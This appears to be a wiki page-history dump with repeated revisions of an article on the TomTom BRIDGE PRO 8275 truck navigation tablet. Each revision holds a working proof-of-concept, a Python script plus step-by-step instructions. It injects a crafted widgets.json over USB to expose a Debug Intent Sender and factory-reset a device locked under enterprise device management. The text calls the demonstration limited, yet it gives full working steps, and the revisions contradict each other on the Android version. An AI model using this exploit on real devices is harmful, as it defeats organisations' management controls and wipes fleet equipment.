int widgetIndexOnPage = widgetIndex % 8;
WidgetInfo wInfo = new WidgetInfo();
wInfo.setWidgetType(WidgetInfo.WidgetType.APPSHORTCUT);
wInfo.setIsFromDrawer(true);
wInfo.setId(widgetIndex + 1);
wInfo.setPackageName(appPackageName);
wInfo.setClassName(appClassName);
wInfo.setPageNumber(pageIndex + 1);
wInfo.setEnabled(true);
wInfo.setLayoutColumn(widgetIndexOnPage % 4);
wInfo.setLayoutRow(widgetIndexOnPage / 4);
wInfo.setBackgroundColor(resources.getColor(R.color.navpad_homescreen_background_color));
wInfo.setTextColor(resources.getColor(R.color.navpad_homescreen_appshortcut_text_color));
wInfo.setName(app.getLabel());
try {
Context otherAppCtx = context.createPackageContext(appPackageName, 2);
iconDrawable = otherAppCtx.getResources().getDrawableForDensity(activityInfo.getIconResource(), 320);
} catch (PackageManager.NameNotFoundException e) {
if (Log.W) {
Log.w(TAG, "Could not find package " + appPackageName + " to fetch larger icon.");
}
iconDrawable = activityInfo.loadIcon(context.getPackageManager());
} catch (Resources.NotFoundException e2) {
if (Log.W) {
Log.w(TAG, "Could not fetch xhdpi icon from package " + appPackageName + " reverting to default icon.");
}
iconDrawable = activityInfo.loadIcon(context.getPackageManager());
}
wInfo.setIconDrawable(iconDrawable);
this.mWidgetInfoList.add(wInfo);
widgetIndex++;
}
}
}
generateWidgetInfoMap();
mAppShortcutsInfoCachedList = this.mWidgetInfoList;
}
</syntaxhighlight>

Start the tablet in MDM mode or admin locked restricted mode. Start the '''PoC python script''' when the tablet is connected to the computer by MicroUSB wire and when a error occurs on the screen the code executed succesfully. Now press ok and swipe to left on the home screen and now you see '''Debug Intent Sender''', open it and fill in the action textbox '''"android.intent.action.MASTER_CLEAR"''' now press send broadcast and your locked device is '''factory reset'''.

PoC script (Windows only, pymtp on Linux is a incomplete fork and does not work).
<syntaxhighlight lang="python">
import os
import json
import time
import win32com.client

OUTPUT_FILE = "widgets.json"

JSON_DATA = {
"application": [
{
"package_name": "com.android.settings",
"class_name": "com.android.settings.DebugIntentSender",
"startcell": "2.11",
"endcell": "2.11"
}
]
}

with open(OUTPUT_FILE, "w") as f:
json.dump(JSON_DATA, f, indent=4)

shell = win32com.client.Dispatch("Shell.Application")
my_computer = shell.NameSpace(17)

tomtom_device = None
for item in my_computer.Items():
if "tomtom" in item.Name.lower():
tomtom_device = item
break

if not tomtom_device:
print("TomTom device not found.")
exit(1)

device_root = tomtom_device.GetFolder

device_root.CopyHere(os.path.abspath(OUTPUT_FILE))
time.sleep(2)

print(f"{OUTPUT_FILE} successfully injected DebugIntentSender.")
</syntaxhighlight>

<gallery widths="120px" heights="120px" perrow="3">
https://i.ibb.co/0psNg8y4/error-after-injection.jpg|error after injection
https://i.ibb.co/HTHtyDL0/debugintentsender.jpg|DebugIntentSender class
https://i.ibb.co/bgZj324Y/broadcast.jpg|broadcast MASTER_CLEAR intent
</gallery>

===== Research paper =====
[[:File:Android createPackageContext Paper 10 5 0.pdf|Android createPackageContext Paper 10 5 0.pdf]]
[https://www.ndss-symposium.org/wp-content/uploads/2017/09/10_5_0.pdf Download PDF remote]

===== Disclosure status =====
This finding is based on internal testing and has not been publicly assigned a CVE at the time of writing.

TomTom BRIDGE 7" Truck/Pro 8275 (4FI70)

2026-04-03T03:20:13Z

Polymorphic7:

== Overview ==
The '''TomTom BRIDGE 7" Truck / PRO 8275 (model 4FI70)''' is a ruggedized, enterprise-grade GPS navigation and telematics device designed for commercial fleet and truck operations. It combines dedicated truck navigation with an open Android-based platform, allowing integration with business applications and fleet management systems such as WEBFLEET.

The device is part of the TomTom BRIDGE ecosystem, which provides customizable in-vehicle hardware for logistics, telematics, and workflow automation.

== Contents ==
__TOC__

== Product family ==
* TomTom BRIDGE platform (Android-based in-vehicle terminal)
* TomTom PRO 8275 Truck (7" driver terminal variant)
* Model identifiers:
** 4FI70 (with cellular/GPRS module)
** 4FI72 / 4FI73 (non-cellular variants)

== Key features ==
* 7-inch rugged touchscreen display
* Truck-specific navigation (routes optimized for size, weight, and restrictions)
* Open Android platform (AOSP-based)
* Support for custom enterprise applications
* Integration with fleet management systems (e.g., WEBFLEET)
* Built-in mobile device management (MDM) capabilities
* Lifetime maps and navigation services (subject to lifecycle support)
* Rear camera and vehicle integration support

== Hardware specifications ==
=== System ===
* Operating system: Android 4.3 (14 Jun 2017 kernel patches)
* CPU: Qualcomm Snapdragon 400 (quad-core, 1.2 GHz)
* RAM: 1.5 GB
* Storage: 16 GB / 32 GB (expandable via SD card)

=== Display ===
* Resolution: 1280×720 (720p)
* Multi-touch capacitive screen

=== Connectivity ===
* Wi-Fi (2.4 GHz / 5 GHz)
* Bluetooth 4.0
* Cellular (model-dependent, e.g., 4FI70 includes GSM/LTE)
* USB (OTG support)
* CAN bus interface for vehicle integration

=== Sensors ===
* GPS / GLONASS GNSS receiver
* Accelerometer
* Gyroscope

=== Power ===
* 8–32V input by docking (compatible with 12V/24V vehicle systems)
* MicroUSB charging 5v

=== Device I/O ===
==== Docking connector ====
* Proprietary multi-pin docking interface
* Used for:
** Power delivery (via vehicle dock)
** CAN bus integration
** External peripherals (e.g., cameras, telematics modules)
* Enables fixed in-vehicle installation with secure mounting

==== USB ====
* Micro-USB port (front-facing)
* Supports:
** Device charging
** Data transfer (MTP/PTP)
** Android Debug Bridge (ADB) access (if enabled)
** USB On-The-Go (OTG) for supported peripherals

==== microSD card slot ====
* Supports microSD / microSDHC cards
* Used for:
** Storage expansion (maps, applications, media)
** Offline data transfer and updates

== Software and platform ==
The TomTom BRIDGE platform is based on the Android Open Source Project (AOSP), enabling:
* Installation of custom APK applications
* Integration with enterprise backends
* Remote configuration and control via MDM systems
* Access to standard Android APIs alongside TomTom navigation APIs

TomTom maintains control over firmware and system updates to ensure regulatory compliance and device integrity.

== Lifecycle ==
Devices in the 4FI70 series have reached end-of-life status but may still receive limited support and updates. :contentReference[oaicite:11]{index=11}

----

== Device Administrator / MDM policy privilege escalation ==
This section is for educational and defensive security research purposes only.

=== Overview ===
The TomTom BRIDGE platform supports enterprise Mobile Device Management (MDM) and Android Device Administrator APIs. These features allow organizations to:
* Enforce security policies
* Control application installation
* Restrict user actions
* Remotely manage the device

Because the device runs 4.3 (kernel patched Jun 14 2017), it relies on legacy Device Administrator mechanisms rather than modern Android Enterprise (Device Owner) APIs.

==== createPackageContext misuse (research finding) ====
During analysis of the TomTom BRIDGE platform, a potential issue was identified related to the use of the Android API method <code>createPackageContext()</code>.

===== Background =====
The <code>createPackageContext()</code> method allows an application to create a context for another installed package. When used with specific flags (e.g., <code>CONTEXT_INCLUDE_CODE</code> or <code>CONTEXT_IGNORE_SECURITY</code>), it can enable access to that application's resources or code, depending on system permissions and signature alignment.

This mechanism is typically restricted to:
* System applications
* Applications signed with the same certificate
* Privileged contexts with elevated permissions

===== Observed behavior =====
Testing on the PRO 8275 (Android 4.3 14 Jun 2017 kernel patches) indicated that:
* Certain preinstalled or privileged applications expose functionality that can be accessed via <code>createPackageContext()</code>
* In some cases, access controls appeared weaker than expected for a hardened enterprise deployment
* The behavior may allow interaction with components or resources outside the normal application sandbox

===== Proof of concept (high-level demonstration) =====
This demonstration is intentionally limited and omits exploit details. It is intended to validate behavior in a controlled research environment only.

Weakness in the system is the widget.json fechter from Internal storage.

com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledWidgets
and
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledApplications

<syntaxhighlight lang="java">
private void fetchInstalledApplications(Context context, boolean showTestapps) {
Drawable iconDrawable;
if (!$assertionsDisabled && context == null) {
throw new AssertionError();
}
if (mAppShortcutsInfoCachedList != null) {
this.mWidgetInfoList.addAll(mAppShortcutsInfoCachedList);
generateWidgetInfoMap();
return;
}
Resources resources = context.getResources();
ArrayList<CachedActivityInfo> apps = createAppList(context, showTestapps);
int widgetIndex = 0;
for (CachedActivityInfo app : apps) {
ActivityInfo activityInfo = app.getActivityInfo();
String appPackageName = activityInfo.packageName;
String appClassName = activityInfo.name;
if (!NAVAPP_PACKAGE_NAME.equals(appPackageName) || !"com.tomtom.navpad.navapp.NavPadAppDrawerActivity".equals(appClassName)) {
if (this.mIsConfigurable || !NAVAPP_PACKAGE_NAME.equals(appPackageName) || !"com.tomtom.navpad.navapp.NavPadWidgetDrawerActivity".equals(appClassName)) {
int pageIndex = widgetIndex / 8;
int widgetIndexOnPage = widgetIndex % 8;
WidgetInfo wInfo = new WidgetInfo();
wInfo.setWidgetType(WidgetInfo.WidgetType.APPSHORTCUT);
wInfo.setIsFromDrawer(true);
wInfo.setId(widgetIndex + 1);
wInfo.setPackageName(appPackageName);
wInfo.setClassName(appClassName);
wInfo.setPageNumber(pageIndex + 1);
wInfo.setEnabled(true);
wInfo.setLayoutColumn(widgetIndexOnPage % 4);
wInfo.setLayoutRow(widgetIndexOnPage / 4);
wInfo.setBackgroundColor(resources.getColor(R.color.navpad_homescreen_background_color));
wInfo.setTextColor(resources.getColor(R.color.navpad_homescreen_appshortcut_text_color));
wInfo.setName(app.getLabel());
try {
Context otherAppCtx = context.createPackageContext(appPackageName, 2);
iconDrawable = otherAppCtx.getResources().getDrawableForDensity(activityInfo.getIconResource(), 320);
} catch (PackageManager.NameNotFoundException e) {
if (Log.W) {
Log.w(TAG, "Could not find package " + appPackageName + " to fetch larger icon.");
}
iconDrawable = activityInfo.loadIcon(context.getPackageManager());
} catch (Resources.NotFoundException e2) {
if (Log.W) {
Log.w(TAG, "Could not fetch xhdpi icon from package " + appPackageName + " reverting to default icon.");
}
iconDrawable = activityInfo.loadIcon(context.getPackageManager());
}
wInfo.setIconDrawable(iconDrawable);
this.mWidgetInfoList.add(wInfo);
widgetIndex++;
}
}
}
generateWidgetInfoMap();
mAppShortcutsInfoCachedList = this.mWidgetInfoList;
}
</syntaxhighlight>

Start the tablet in MDM mode or admin locked restricted mode. Start the '''PoC python script''' when the tablet is connected to the computer by MicroUSB wire and when a error occurs on the screen the code executed succesfully. Now press ok and swipe to left on the home screen and now you see '''Debug Intent Sender''', open it and fill in the action textbox '''"android.intent.action.MASTER_CLEAR"''' now press send broadcast and your locked device is '''factory reset'''.

PoC script (Windows only, pymtp on Linux is a incomplete fork and does not work).
<syntaxhighlight lang="python">
import os
import json
import time
import win32com.client

OUTPUT_FILE = "widgets.json"

JSON_DATA = {
"application": [
{
"package_name": "com.android.settings",
"class_name": "com.android.settings.DebugIntentSender",
"startcell": "2.11",
"endcell": "2.11"
}
]
}

with open(OUTPUT_FILE, "w") as f:
json.dump(JSON_DATA, f, indent=4)

shell = win32com.client.Dispatch("Shell.Application")
my_computer = shell.NameSpace(17)

tomtom_device = None
for item in my_computer.Items():
if "tomtom" in item.Name.lower():
tomtom_device = item
break

if not tomtom_device:
print("TomTom device not found.")
exit(1)

device_root = tomtom_device.GetFolder

device_root.CopyHere(os.path.abspath(OUTPUT_FILE))
time.sleep(2)

print(f"{OUTPUT_FILE} successfully injected DebugIntentSender.")
</syntaxhighlight>

<gallery widths="120px" heights="120px" perrow="3">
https://i.ibb.co/0psNg8y4/error-after-injection.jpg|error after injection
https://i.ibb.co/HTHtyDL0/debugintentsender.jpg|DebugIntentSender class
https://i.ibb.co/bgZj324Y/broadcast.jpg|broadcast MASTER_CLEAR intent
</gallery>

===== Research paper =====
[[:File:Android createPackageContext Paper 10 5 0.pdf|Android createPackageContext Paper 10 5 0.pdf]]
[https://www.ndss-symposium.org/wp-content/uploads/2017/09/10_5_0.pdf Download PDF remote]

===== Disclosure status =====
This finding is based on internal testing and has not been publicly assigned a CVE at the time of writing.

TomTom BRIDGE 7" Truck/Pro 8275 (4FI70)

2026-04-03T03:18:01Z

Polymorphic7:

== Overview ==
The '''TomTom BRIDGE 7" Truck / PRO 8275 (model 4FI70)''' is a ruggedized, enterprise-grade GPS navigation and telematics device designed for commercial fleet and truck operations. It combines dedicated truck navigation with an open Android-based platform, allowing integration with business applications and fleet management systems such as WEBFLEET.

The device is part of the TomTom BRIDGE ecosystem, which provides customizable in-vehicle hardware for logistics, telematics, and workflow automation.

== Contents ==
__TOC__

== Product family ==
* TomTom BRIDGE platform (Android-based in-vehicle terminal)
* TomTom PRO 8275 Truck (7" driver terminal variant)
* Model identifiers:
** 4FI70 (with cellular/GPRS module)
** 4FI72 / 4FI73 (non-cellular variants)

== Key features ==
* 7-inch rugged touchscreen display
* Truck-specific navigation (routes optimized for size, weight, and restrictions)
* Open Android platform (AOSP-based)
* Support for custom enterprise applications
* Integration with fleet management systems (e.g., WEBFLEET)
* Built-in mobile device management (MDM) capabilities
* Lifetime maps and navigation services (subject to lifecycle support)
* Rear camera and vehicle integration support

== Hardware specifications ==
=== System ===
* Operating system: Android 6.0.1 (latest update)
* CPU: Qualcomm Snapdragon 400 (quad-core, 1.2 GHz)
* RAM: 1.5 GB
* Storage: 16 GB / 32 GB (expandable via SD card)

=== Display ===
* Resolution: 1280×720 (720p)
* Multi-touch capacitive screen

=== Connectivity ===
* Wi-Fi (2.4 GHz / 5 GHz)
* Bluetooth 4.0
* Cellular (model-dependent, e.g., 4FI70 includes GSM/LTE)
* USB (OTG support)
* CAN bus interface for vehicle integration

=== Sensors ===
* GPS / GLONASS GNSS receiver
* Accelerometer
* Gyroscope

=== Power ===
* 8–32V input by docking (compatible with 12V/24V vehicle systems)
* MicroUSB charging 5v

=== Device I/O ===
==== Docking connector ====
* Proprietary multi-pin docking interface
* Used for:
** Power delivery (via vehicle dock)
** CAN bus integration
** External peripherals (e.g., cameras, telematics modules)
* Enables fixed in-vehicle installation with secure mounting

==== USB ====
* Micro-USB port (front-facing)
* Supports:
** Device charging
** Data transfer (MTP/PTP)
** Android Debug Bridge (ADB) access (if enabled)
** USB On-The-Go (OTG) for supported peripherals

==== microSD card slot ====
* Supports microSD / microSDHC cards
* Used for:
** Storage expansion (maps, applications, media)
** Offline data transfer and updates

== Software and platform ==
The TomTom BRIDGE platform is based on the Android Open Source Project (AOSP), enabling:
* Installation of custom APK applications
* Integration with enterprise backends
* Remote configuration and control via MDM systems
* Access to standard Android APIs alongside TomTom navigation APIs

TomTom maintains control over firmware and system updates to ensure regulatory compliance and device integrity.

== Lifecycle ==
Devices in the 4FI70 series have reached end-of-life status but may still receive limited support and updates. :contentReference[oaicite:11]{index=11}

----

== Device Administrator / MDM policy privilege escalation ==
This section is for educational and defensive security research purposes only.

=== Overview ===
The TomTom BRIDGE platform supports enterprise Mobile Device Management (MDM) and Android Device Administrator APIs. These features allow organizations to:
* Enforce security policies
* Control application installation
* Restrict user actions
* Remotely manage the device

Because the device runs 4.3 (kernel patched Jun 14 2017), it relies on legacy Device Administrator mechanisms rather than modern Android Enterprise (Device Owner) APIs.

==== createPackageContext misuse (research finding) ====
During analysis of the TomTom BRIDGE platform, a potential issue was identified related to the use of the Android API method <code>createPackageContext()</code>.

===== Background =====
The <code>createPackageContext()</code> method allows an application to create a context for another installed package. When used with specific flags (e.g., <code>CONTEXT_INCLUDE_CODE</code> or <code>CONTEXT_IGNORE_SECURITY</code>), it can enable access to that application's resources or code, depending on system permissions and signature alignment.

This mechanism is typically restricted to:
* System applications
* Applications signed with the same certificate
* Privileged contexts with elevated permissions

===== Observed behavior =====
Testing on the PRO 8275 (Android 6.0.1) indicated that:
* Certain preinstalled or privileged applications expose functionality that can be accessed via <code>createPackageContext()</code>
* In some cases, access controls appeared weaker than expected for a hardened enterprise deployment
* The behavior may allow interaction with components or resources outside the normal application sandbox

===== Proof of concept (high-level demonstration) =====
This demonstration is intentionally limited and omits exploit details. It is intended to validate behavior in a controlled research environment only.

Weakness in the system is the widget.json fechter from Internal storage.

com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledWidgets
and
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledApplications

<syntaxhighlight lang="java">
private void fetchInstalledApplications(Context context, boolean showTestapps) {
Drawable iconDrawable;
if (!$assertionsDisabled && context == null) {
throw new AssertionError();
}
if (mAppShortcutsInfoCachedList != null) {
this.mWidgetInfoList.addAll(mAppShortcutsInfoCachedList);
generateWidgetInfoMap();
return;
}
Resources resources = context.getResources();
ArrayList<CachedActivityInfo> apps = createAppList(context, showTestapps);
int widgetIndex = 0;
for (CachedActivityInfo app : apps) {
ActivityInfo activityInfo = app.getActivityInfo();
String appPackageName = activityInfo.packageName;
String appClassName = activityInfo.name;
if (!NAVAPP_PACKAGE_NAME.equals(appPackageName) || !"com.tomtom.navpad.navapp.NavPadAppDrawerActivity".equals(appClassName)) {
if (this.mIsConfigurable || !NAVAPP_PACKAGE_NAME.equals(appPackageName) || !"com.tomtom.navpad.navapp.NavPadWidgetDrawerActivity".equals(appClassName)) {
int pageIndex = widgetIndex / 8;
int widgetIndexOnPage = widgetIndex % 8;
WidgetInfo wInfo = new WidgetInfo();
wInfo.setWidgetType(WidgetInfo.WidgetType.APPSHORTCUT);
wInfo.setIsFromDrawer(true);
wInfo.setId(widgetIndex + 1);
wInfo.setPackageName(appPackageName);
wInfo.setClassName(appClassName);
wInfo.setPageNumber(pageIndex + 1);
wInfo.setEnabled(true);
wInfo.setLayoutColumn(widgetIndexOnPage % 4);
wInfo.setLayoutRow(widgetIndexOnPage / 4);
wInfo.setBackgroundColor(resources.getColor(R.color.navpad_homescreen_background_color));
wInfo.setTextColor(resources.getColor(R.color.navpad_homescreen_appshortcut_text_color));
wInfo.setName(app.getLabel());
try {
Context otherAppCtx = context.createPackageContext(appPackageName, 2);
iconDrawable = otherAppCtx.getResources().getDrawableForDensity(activityInfo.getIconResource(), 320);
} catch (PackageManager.NameNotFoundException e) {
if (Log.W) {
Log.w(TAG, "Could not find package " + appPackageName + " to fetch larger icon.");
}
iconDrawable = activityInfo.loadIcon(context.getPackageManager());
} catch (Resources.NotFoundException e2) {
if (Log.W) {
Log.w(TAG, "Could not fetch xhdpi icon from package " + appPackageName + " reverting to default icon.");
}
iconDrawable = activityInfo.loadIcon(context.getPackageManager());
}
wInfo.setIconDrawable(iconDrawable);
this.mWidgetInfoList.add(wInfo);
widgetIndex++;
}
}
}
generateWidgetInfoMap();
mAppShortcutsInfoCachedList = this.mWidgetInfoList;
}
</syntaxhighlight>

Start the tablet in MDM mode or admin locked restricted mode. Start the '''PoC python script''' when the tablet is connected to the computer by MicroUSB wire and when a error occurs on the screen the code executed succesfully. Now press ok and swipe to left on the home screen and now you see '''Debug Intent Sender''', open it and fill in the action textbox '''"android.intent.action.MASTER_CLEAR"''' now press send broadcast and your locked device is '''factory reset'''.

PoC script (Windows only, pymtp on Linux is a incomplete fork and does not work).
<syntaxhighlight lang="python">
import os
import json
import time
import win32com.client

OUTPUT_FILE = "widgets.json"

JSON_DATA = {
"application": [
{
"package_name": "com.android.settings",
"class_name": "com.android.settings.DebugIntentSender",
"startcell": "2.11",
"endcell": "2.11"
}
]
}

with open(OUTPUT_FILE, "w") as f:
json.dump(JSON_DATA, f, indent=4)

shell = win32com.client.Dispatch("Shell.Application")
my_computer = shell.NameSpace(17)

tomtom_device = None
for item in my_computer.Items():
if "tomtom" in item.Name.lower():
tomtom_device = item
break

if not tomtom_device:
print("TomTom device not found.")
exit(1)

device_root = tomtom_device.GetFolder

device_root.CopyHere(os.path.abspath(OUTPUT_FILE))
time.sleep(2)

print(f"{OUTPUT_FILE} successfully injected DebugIntentSender.")
</syntaxhighlight>

<gallery widths="120px" heights="120px" perrow="3">
https://i.ibb.co/0psNg8y4/error-after-injection.jpg|error after injection
https://i.ibb.co/HTHtyDL0/debugintentsender.jpg|DebugIntentSender class
https://i.ibb.co/bgZj324Y/broadcast.jpg|broadcast MASTER_CLEAR intent
</gallery>

===== Research paper =====
[[:File:Android createPackageContext Paper 10 5 0.pdf|Android createPackageContext Paper 10 5 0.pdf]]
[https://www.ndss-symposium.org/wp-content/uploads/2017/09/10_5_0.pdf Download PDF remote]

===== Disclosure status =====
This finding is based on internal testing and has not been publicly assigned a CVE at the time of writing.

TomTom BRIDGE 7" Truck/Pro 8275 (4FI70)

2026-04-03T03:17:46Z

Polymorphic7: v1

= TomTom BRIDGE 7" Truck / PRO 8275 (4FI70) =

== Overview ==
The '''TomTom BRIDGE 7" Truck / PRO 8275 (model 4FI70)''' is a ruggedized, enterprise-grade GPS navigation and telematics device designed for commercial fleet and truck operations. It combines dedicated truck navigation with an open Android-based platform, allowing integration with business applications and fleet management systems such as WEBFLEET.

The device is part of the TomTom BRIDGE ecosystem, which provides customizable in-vehicle hardware for logistics, telematics, and workflow automation.

== Contents ==
__TOC__

== Product family ==
* TomTom BRIDGE platform (Android-based in-vehicle terminal)
* TomTom PRO 8275 Truck (7" driver terminal variant)
* Model identifiers:
** 4FI70 (with cellular/GPRS module)
** 4FI72 / 4FI73 (non-cellular variants)

== Key features ==
* 7-inch rugged touchscreen display
* Truck-specific navigation (routes optimized for size, weight, and restrictions)
* Open Android platform (AOSP-based)
* Support for custom enterprise applications
* Integration with fleet management systems (e.g., WEBFLEET)
* Built-in mobile device management (MDM) capabilities
* Lifetime maps and navigation services (subject to lifecycle support)
* Rear camera and vehicle integration support

== Hardware specifications ==
=== System ===
* Operating system: Android 6.0.1 (latest update)
* CPU: Qualcomm Snapdragon 400 (quad-core, 1.2 GHz)
* RAM: 1.5 GB
* Storage: 16 GB / 32 GB (expandable via SD card)

=== Display ===
* Resolution: 1280×720 (720p)
* Multi-touch capacitive screen

=== Connectivity ===
* Wi-Fi (2.4 GHz / 5 GHz)
* Bluetooth 4.0
* Cellular (model-dependent, e.g., 4FI70 includes GSM/LTE)
* USB (OTG support)
* CAN bus interface for vehicle integration

=== Sensors ===
* GPS / GLONASS GNSS receiver
* Accelerometer
* Gyroscope

=== Power ===
* 8–32V input by docking (compatible with 12V/24V vehicle systems)
* MicroUSB charging 5v

=== Device I/O ===
==== Docking connector ====
* Proprietary multi-pin docking interface
* Used for:
** Power delivery (via vehicle dock)
** CAN bus integration
** External peripherals (e.g., cameras, telematics modules)
* Enables fixed in-vehicle installation with secure mounting

==== USB ====
* Micro-USB port (front-facing)
* Supports:
** Device charging
** Data transfer (MTP/PTP)
** Android Debug Bridge (ADB) access (if enabled)
** USB On-The-Go (OTG) for supported peripherals

==== microSD card slot ====
* Supports microSD / microSDHC cards
* Used for:
** Storage expansion (maps, applications, media)
** Offline data transfer and updates

== Software and platform ==
The TomTom BRIDGE platform is based on the Android Open Source Project (AOSP), enabling:
* Installation of custom APK applications
* Integration with enterprise backends
* Remote configuration and control via MDM systems
* Access to standard Android APIs alongside TomTom navigation APIs

TomTom maintains control over firmware and system updates to ensure regulatory compliance and device integrity.

== Lifecycle ==
Devices in the 4FI70 series have reached end-of-life status but may still receive limited support and updates. :contentReference[oaicite:11]{index=11}

----

== Device Administrator / MDM policy privilege escalation ==
This section is for educational and defensive security research purposes only.

=== Overview ===
The TomTom BRIDGE platform supports enterprise Mobile Device Management (MDM) and Android Device Administrator APIs. These features allow organizations to:
* Enforce security policies
* Control application installation
* Restrict user actions
* Remotely manage the device

Because the device runs 4.3 (kernel patched Jun 14 2017), it relies on legacy Device Administrator mechanisms rather than modern Android Enterprise (Device Owner) APIs.

==== createPackageContext misuse (research finding) ====
During analysis of the TomTom BRIDGE platform, a potential issue was identified related to the use of the Android API method <code>createPackageContext()</code>.

===== Background =====
The <code>createPackageContext()</code> method allows an application to create a context for another installed package. When used with specific flags (e.g., <code>CONTEXT_INCLUDE_CODE</code> or <code>CONTEXT_IGNORE_SECURITY</code>), it can enable access to that application's resources or code, depending on system permissions and signature alignment.

This mechanism is typically restricted to:
* System applications
* Applications signed with the same certificate
* Privileged contexts with elevated permissions

===== Observed behavior =====
Testing on the PRO 8275 (Android 6.0.1) indicated that:
* Certain preinstalled or privileged applications expose functionality that can be accessed via <code>createPackageContext()</code>
* In some cases, access controls appeared weaker than expected for a hardened enterprise deployment
* The behavior may allow interaction with components or resources outside the normal application sandbox

===== Proof of concept (high-level demonstration) =====
This demonstration is intentionally limited and omits exploit details. It is intended to validate behavior in a controlled research environment only.

Weakness in the system is the widget.json fechter from Internal storage.

com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledWidgets
and
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledApplications

<syntaxhighlight lang="java">
private void fetchInstalledApplications(Context context, boolean showTestapps) {
Drawable iconDrawable;
if (!$assertionsDisabled && context == null) {
throw new AssertionError();
}
if (mAppShortcutsInfoCachedList != null) {
this.mWidgetInfoList.addAll(mAppShortcutsInfoCachedList);
generateWidgetInfoMap();
return;
}
Resources resources = context.getResources();
ArrayList<CachedActivityInfo> apps = createAppList(context, showTestapps);
int widgetIndex = 0;
for (CachedActivityInfo app : apps) {
ActivityInfo activityInfo = app.getActivityInfo();
String appPackageName = activityInfo.packageName;
String appClassName = activityInfo.name;
if (!NAVAPP_PACKAGE_NAME.equals(appPackageName) || !"com.tomtom.navpad.navapp.NavPadAppDrawerActivity".equals(appClassName)) {
if (this.mIsConfigurable || !NAVAPP_PACKAGE_NAME.equals(appPackageName) || !"com.tomtom.navpad.navapp.NavPadWidgetDrawerActivity".equals(appClassName)) {
int pageIndex = widgetIndex / 8;
int widgetIndexOnPage = widgetIndex % 8;
WidgetInfo wInfo = new WidgetInfo();
wInfo.setWidgetType(WidgetInfo.WidgetType.APPSHORTCUT);
wInfo.setIsFromDrawer(true);
wInfo.setId(widgetIndex + 1);
wInfo.setPackageName(appPackageName);
wInfo.setClassName(appClassName);
wInfo.setPageNumber(pageIndex + 1);
wInfo.setEnabled(true);
wInfo.setLayoutColumn(widgetIndexOnPage % 4);
wInfo.setLayoutRow(widgetIndexOnPage / 4);
wInfo.setBackgroundColor(resources.getColor(R.color.navpad_homescreen_background_color));
wInfo.setTextColor(resources.getColor(R.color.navpad_homescreen_appshortcut_text_color));
wInfo.setName(app.getLabel());
try {
Context otherAppCtx = context.createPackageContext(appPackageName, 2);
iconDrawable = otherAppCtx.getResources().getDrawableForDensity(activityInfo.getIconResource(), 320);
} catch (PackageManager.NameNotFoundException e) {
if (Log.W) {
Log.w(TAG, "Could not find package " + appPackageName + " to fetch larger icon.");
}
iconDrawable = activityInfo.loadIcon(context.getPackageManager());
} catch (Resources.NotFoundException e2) {
if (Log.W) {
Log.w(TAG, "Could not fetch xhdpi icon from package " + appPackageName + " reverting to default icon.");
}
iconDrawable = activityInfo.loadIcon(context.getPackageManager());
}
wInfo.setIconDrawable(iconDrawable);
this.mWidgetInfoList.add(wInfo);
widgetIndex++;
}
}
}
generateWidgetInfoMap();
mAppShortcutsInfoCachedList = this.mWidgetInfoList;
}
</syntaxhighlight>

Start the tablet in MDM mode or admin locked restricted mode. Start the '''PoC python script''' when the tablet is connected to the computer by MicroUSB wire and when a error occurs on the screen the code executed succesfully. Now press ok and swipe to left on the home screen and now you see '''Debug Intent Sender''', open it and fill in the action textbox '''"android.intent.action.MASTER_CLEAR"''' now press send broadcast and your locked device is '''factory reset'''.

PoC script (Windows only, pymtp on Linux is a incomplete fork and does not work).
<syntaxhighlight lang="python">
import os
import json
import time
import win32com.client

OUTPUT_FILE = "widgets.json"

JSON_DATA = {
"application": [
{
"package_name": "com.android.settings",
"class_name": "com.android.settings.DebugIntentSender",
"startcell": "2.11",
"endcell": "2.11"
}
]
}

with open(OUTPUT_FILE, "w") as f:
json.dump(JSON_DATA, f, indent=4)

shell = win32com.client.Dispatch("Shell.Application")
my_computer = shell.NameSpace(17)

tomtom_device = None
for item in my_computer.Items():
if "tomtom" in item.Name.lower():
tomtom_device = item
break

if not tomtom_device:
print("TomTom device not found.")
exit(1)

device_root = tomtom_device.GetFolder

device_root.CopyHere(os.path.abspath(OUTPUT_FILE))
time.sleep(2)

print(f"{OUTPUT_FILE} successfully injected DebugIntentSender.")
</syntaxhighlight>

<gallery widths="120px" heights="120px" perrow="3">
https://i.ibb.co/0psNg8y4/error-after-injection.jpg|error after injection
https://i.ibb.co/HTHtyDL0/debugintentsender.jpg|DebugIntentSender class
https://i.ibb.co/bgZj324Y/broadcast.jpg|broadcast MASTER_CLEAR intent
</gallery>

===== Research paper =====
[[:File:Android createPackageContext Paper 10 5 0.pdf|Android createPackageContext Paper 10 5 0.pdf]]
[https://www.ndss-symposium.org/wp-content/uploads/2017/09/10_5_0.pdf Download PDF remote]

===== Disclosure status =====
This finding is based on internal testing and has not been publicly assigned a CVE at the time of writing.

File:Error after injection.jpg

2026-04-03T03:11:54Z

Polymorphic7:

File:Android createPackageContext Paper 10 5 0.pdf

2026-04-03T02:42:48Z

Polymorphic7:

Flash Extraction

2026-04-02T14:51:18Z

Polymorphic7: Remove Ezp2023+ and add XGECU T48 TL866 II Plus

[[File:Flash mediawiki banner.png|frameless|1280x300px]]

==Table==
====Introduction====
Embedded devices or smart devices store their code in a ROM or flash memory chip primarily because these types of memory are non-volatile and permanent even after power loss. 
The data is stored even after the system is turned off in contrast to volatile memory that needs to stay powered on. A prime example of this is if you put your computer in hibernate S4 or (modern standby) S0. 
The RAM memory will stay powered to keep everything in the memory active so that if you press the power button the system will be back up in seconds, if you disconnect the power the hibernated session will be gone because RAM is volatile memory.

This wiki page will provide a basic explanation of embedded and smart devices and their ways of storing code in modern electronics and provide some great resources in regard of the extraction techniques. 
Some in-depth information regarding the subject will be shared here too.
----
====Purpose of data extraction====
Reverse engineering code stored in ROM firmware is a practice that serves multiple purposes across various fields, particularly in technology and security.

One of the primary reasons for reverse engineering firmware is to identify and mitigate security vulnerabilities. As IoT devices and embedded systems become more prevalent, ensuring their security is crucial. By analyzing the firmware, security researchers can uncover weaknesses in the code that could be exploited by malicious actors locally or even remotely which could pose a high risk to many users.

Below, we will explore the reasons why individuals and organizations engage in this process.
:* '''Security audits'''
